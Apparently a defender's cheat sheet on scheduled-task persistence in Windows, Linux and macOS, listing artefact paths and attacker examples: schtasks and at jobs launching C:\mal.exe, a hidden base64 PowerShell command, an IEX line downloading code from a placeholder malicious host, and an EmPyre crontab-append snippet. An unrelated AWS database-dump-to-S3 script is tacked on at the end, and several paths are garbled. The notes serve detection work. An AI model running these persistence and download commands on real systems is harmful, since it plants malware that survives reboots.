Windows
❗️ Both
atandschtasks.execan create tasks remotely.
🏺 Artefacts:
- 🪵 Event Log: Task Scheduler Operational.
- 🛠️ autoruns
- 📂
C: \Windows\ Tasks\ \*.job - 📂
C: \Windows\SchedLgU.txt(Win XP) - 📂
C: \Windows\System32\Tasks
at
at.exe (deprecated but can still be used) and schtasks.exe. For at see at*.job and Schdlgu.txt
WinXP: at jobs run with SYSTEM privileges.
Files are created here: \Windows\Tasks and \Windows\System32\Tasks (xml duplicate Win7+). Created with: at.exe 22:22:22 C:\mal.exe or
C: \Windows\ Tasks\ \*.job
C: \Windows\SchedLgU.txt # Win XP
schtasks.exe
schtasks.exe /create /sc daily /tn winsvchost /tr C:\mal.exe /st 09:10:00
WMI
📕 RTFM
An attempt to be stealthy.
powershell -W Hidden -nop -noni -ec <base64somthing> # The output of this command won't show a PowerShell window and the output as well. The script to execute is base64 encoded.
# W WindowStyle = Hidden
# nop NoProfile Does not load PS profile
# noni NonINteractive - no interactive prompt to the user presented
# a popular string to download stuff from the Internet
IEX (New-Object System.Net.WebClient).downloadstring('http://somethingmalicious.com/file')
Linux
/etc/cron*
/var/spool/crontabs
/var/spool/atjobs
/etc/anacron
macOS
Cron
/usr/bin/crontab
Post-exploitation RT tool EmPyre has a module to exploit this technique.
cmd = 'crontab -l | { cat; echo "0 * * * * %s"; } | crontab -'subprocess.Popen(cmd, shell=True, stdout=subprocess.PIPE).stdout.read()
The cat and echo commands append the new command. The %s in the cmd variable will be updated at runtime with the path of the item to persist, and the 0 * * * * component instructs macOS to execute the job every hour.
The crontab - will reinstall any existing jobs, along with the new one.
At
/private/var/at/jobs/ directory and enumerate them via the /usr/bin/atq utility.
❗️ On a default install of macOS, the
atscheduler,/usr/libexec/atrun, is disabled. However, malware can enable it with 👑 root privileges with the following command:launchctl load -w /System/Library/LaunchDaemons/com.apple.atrun.plist.
After enabling this scheduler, malware can create an at job by simply piping persistent commands into /usr/bin/at, specifying the time and date of execution.
Not a popular technique.
Periodic
/etc/periodic
Though this directory is owned by root, malware with adequate privileges may be able to create (or subvert) a periodic script in order to achieve persistence at regular intervals. “What is the difference between ‘periodic’ and ‘cron’ on OS X?” https://superuser.com/questions/391204/what-is-the-difference-between-periodic-and-cron-on-os-x/
Login and Logout Hooks
Look for either LoginHook or LogoutHook in the following plist:
~/Library/Preferences/com.apple.loginwindow.plist
📕 RTFM
#!/bin/bash
export FILENAME=$(date +"%s")
export METADATA_TOKEN=$(curl -s -X PUT -H 'X-aws-ec2-metadata-token-ttl-seconds: 120' http://169.254.169.254/latest/api/token) export AWS_REGION=$(curl -s -H "X-aws-ec2-metadata-token: $METADATA_TOKEN" http://169.254.169.254/latest/dynamic/instance-identity/ document | jq -r '.region')
export DB_SECRETS=$(aws secretsmanager get-secret-value --secret-id $(unique_string)/database --region $AWS_REGION | jq -r '.SecretString')
export DB_USERNAME=$(echo $DB_SECRETS | jq -r '.username')
export DB_NAME=$(echo $DB_SECRETS | jq -r '.name')
export DB_HOST=$(echo $DB_SECRETS | jq -r '.endpoint' | cut -d: -f1)
export DB_PASSWORD=$(echo $DB_SECRETS | jq -r '.password')
MYSQL_PWD=$DB_PASSWORD mysqldump --databases $DB_NAME --tables users -u $DB_USERNAME -h $DB_HOST > /tmp/$FILENAME.sql
aws kms encrypt --key-id alias/backup-$(unique_string) --plaintext fileb:///tmp/$FILENAME.sql --region $AWS_REGION | jq -r '.CiphertextBlob' > /tmp/$FILENAME.sql.enc
aws s3 cp /tmp/$FILENAME.sql.enc s3://sec510-backup-$(unique_string)
rm /tmp/$FILENAME.sql*